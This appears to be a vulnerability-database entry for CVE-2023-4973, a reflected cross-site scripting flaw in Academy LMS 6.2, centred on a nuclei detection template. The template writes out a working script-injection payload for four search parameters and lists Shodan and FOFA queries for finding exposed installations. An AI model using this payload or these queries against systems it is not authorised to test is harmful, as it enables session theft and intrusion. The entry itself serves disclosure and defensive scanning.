Academy LMS 6.2 - Cross-Site Scripting

29 Jun 2026 05:52:57 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Academy LMS 6.2 on Windows is vulnerable to cross-site scripting. Manipulating the GET parameters of /academy/tutor/filter leads to a remotely exploitable XSS attack.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | Academy LMS 6.2 Cross Site Scripting Vulnerability | 18 Sep 2023 00:00 | zdt |
| Circl | CVE-2023-4973 | 24 Apr 2024 21:09 | circl |
| CNNVD | Creative Item Academy LMS Cross-Site Scripting Vulnerability | 14 Sep 2023 00:00 | cnnvd |
| CVE | CVE-2023-4973 | 15 Sep 2023 02:00 | cve |
| Cvelist | CVE-2023-4973 Academy LMS GET Parameter filter cross site scripting | 15 Sep 2023 02:00 | cvelist |
| Exploit DB | Academy LMS 6.2 - Reflected XSS | 31 Jan 2024 00:00 | exploitdb |
| EUVD | EUVD-2023-54809 | 3 Oct 2025 20:07 | euvd |
| NVD | CVE-2023-4973 | 15 Sep 2023 02:15 | nvd |
| OSV | CVE-2023-4973 | 15 Sep 2023 02:15 | osv |
| Packet Storm | Academy LMS 6.2 Cross Site Scripting | 15 Sep 2023 00:00 | packetstorm |

Code

id: CVE-2023-4973

info:
  name: Academy LMS 6.2 - Cross-Site Scripting
  author: ritikchaddha,princechaddha
  severity: medium
  description: |
    A vulnerability was found in Academy LMS 6.2 on Windows. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument searched_word/searched_tution_class_type[]/searched_price_type[]/searched_duration[] leads to cross site scripting. The attack can be launched remotely.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript via reflected XSS in search parameters, potentially stealing user session cookies or performing actions on behalf of users.
  remediation: |
    Update Academy LMS to version 6.3 or later.
  reference:
    - https://packetstormsecurity.com/files/174680/Academy-LMS-6.2-Cross-Site-Scripting.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4973
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4973
    cwe-id: CWE-79
    epss-score: 0.01835
    epss-percentile: 0.76239
    cpe: cpe:2.3:a:creativeitem:academy_lms:6.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: creativeitem
    product: academy_lms
    shodan-query:
      - html:"Academy LMS"
      - http.html:"academy lms"
    fofa-query:
      - body="Academy LMS"
      - body="academy lms"
  tags: packetstorm,cve2023,cve,academylms,xss,creativeitem,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/academy/tutor/filter?searched_word=acoa5\"><script>alert(document.domain)</script>dyzs0&searched_tution_class_type%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0&price_min=1&price_max=9&searched_price_type%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0&searched_duration%5B%5D=acoa5\"><script>alert(document.domain)</script>dyzs0"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/html")'
          - 'contains_all(body, "<script>alert(document.domain)</script>", "List of tuitions")'
        condition: and
# digest: 4b0a004830460221009b1bd38111cd5aad051d2bee0a490ff622aeee971861d5367b1314b96e9ab782022100e523e5d6f2641c4650cf61ae4b9f60c7d3c8914d648fc1517ed4a0e2889b7f7e:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00 (Current)
Vulners AI Score: 3.8 (Low risk)
CVSS 3.1: 3.5 - 6.1
CVSS 2: 4
CVSS 3: 3.5
EPSS: 0.01835